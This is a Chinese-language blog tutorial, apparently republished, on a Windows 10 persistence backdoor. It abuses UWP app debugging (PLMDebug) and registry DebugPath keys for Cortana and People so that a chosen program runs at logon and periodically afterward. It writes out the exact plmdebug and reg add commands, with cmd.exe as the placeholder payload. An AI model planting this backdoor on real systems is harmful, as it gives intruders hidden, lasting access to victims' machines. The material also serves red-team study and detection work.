利用通用应用UWP进行权限维持-Windows系列-PHP中文网

利用通用应用UWP进行权限维持

絕刀狂花

发布： 2025-08-28 11:10:32

原创

167人浏览过

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

0x01 前言

这种权限维持方式也是一种自启动后门，但仅支持Windows 10通用应用平台（UWP）上的应用程序，如：Cortana和People。

只需将它置于调试模式后并配合Process Monitor工具找到UWP应用对应的注册表位置，然后修改为我们要执行的恶意程序，当机器注销/重启登录时就会执行这个程序。

原文地址：https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx

0x02 列出软件包名称

首先我们需要找出当前系统完整的软件包名称，因为后边PLMDebug调试时要用到，可以使用以下命令列出所有的软件包，这里仅显示name、packagefullname。

代码语言：javascript代码运行次数：0运行复制

<pre class="brush:php;toolbar:false;">Get-AppxPackage | select name,packagefullname

登录后复制

0x03 安装PLMDebug

PLMDebug.exe包含在Windows调试工具中，所以我们只需要安装Windows 10 SDK即可，安装过程中只要选择“Debugging Tools for Windows”这一项就好了。

下载地址：https://developer.microsoft.com/zh-cn/windows/downloads/windows-10-sdk/

0x04 调试Cortana软件包

使用以下命令调试Cortana软件包，然后在开始菜单中打开Cortana，胡乱点一下，稍等片刻即可弹出cmd.exe。

AppMall应用商店

AI应用商店，提供即时交付、按需付费的人工智能应用服务

查看详情

代码语言：javascript代码运行次数：0运行复制

<pre class="brush:php;toolbar:false;">plmdebug.exe /enabledebug Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy C:\Windows\System32\cmd.exe

登录后复制

Process Monitor监视到了它的注册表位置，而且发现写入了大量相关注册表项和值，所有注册表项的值都是：

C:\Windows\System32\cmd.exe

登录后复制

，不过只要注销/重启系统后就没有了。

还在调试过程中发现这些行为都是由

sihost.exe

登录后复制

进程产生，所以我们只要在Process Monitor过滤器中仅显示包含sihost.exe即可显示出来。

下载地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/procmon

0x05 修改Cortana注册表

通过以下命令都可以实现持久化，方法都是一样的，只是注册表位置不一样，第一条会损坏原有Cortana程序，无法正常运行，第二条不会损坏原有Cortana程序，可以正常运行。

修改以下注册表项时必须先确定与你当前系统的UWP应用程序版本相对应，否则后门不会被触发。

People人脉：

代码语言：javascript代码运行次数：0运行复制

<pre class="brush:php;toolbar:false;">reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe /d "C:\Windows\System32\cmd.exe"reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.People_10.1807.2131.0_x64__8wekyb3d8bbwe\DebugInformation\x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x.AppX368sbpk1kx658x0p332evjk2v0y02kxp.mca /v DebugPath /d "C:\Windows\System32\cmd.exe"

登录后复制

Cortana(小娜)：

代码语言：javascript代码运行次数：0运行复制

<pre class="brush:php;toolbar:false;">reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PackagedAppXDebug\Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy /d "C:\Windows\System32\cmd.exe"reg add HKCU\Software\Classes\ActivatableClasses\Package\Microsoft.Windows.Cortana_1.10.8.17134_neutral_neutral_cw5n1h2txyewy\DebugInformation\CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca /v DebugPath /d "C:\Windows\System32\cmd.exe"

登录后复制

注：笔者在当前测试环境下设置好了Cortana后门，在注销/重启系统登录时会执行1次，进入系统后每间隔5-20分钟左右会执行1次，这应该是微软后台自动运行了Cortana(小娜)，所以会再次触发该后门，没有找到相关资料，具体原因不清楚，全靠猜，0.0 ！！！

以上就是利用通用应用UWP进行权限维持的详细内容，更多请关注php中文网其它相关文章！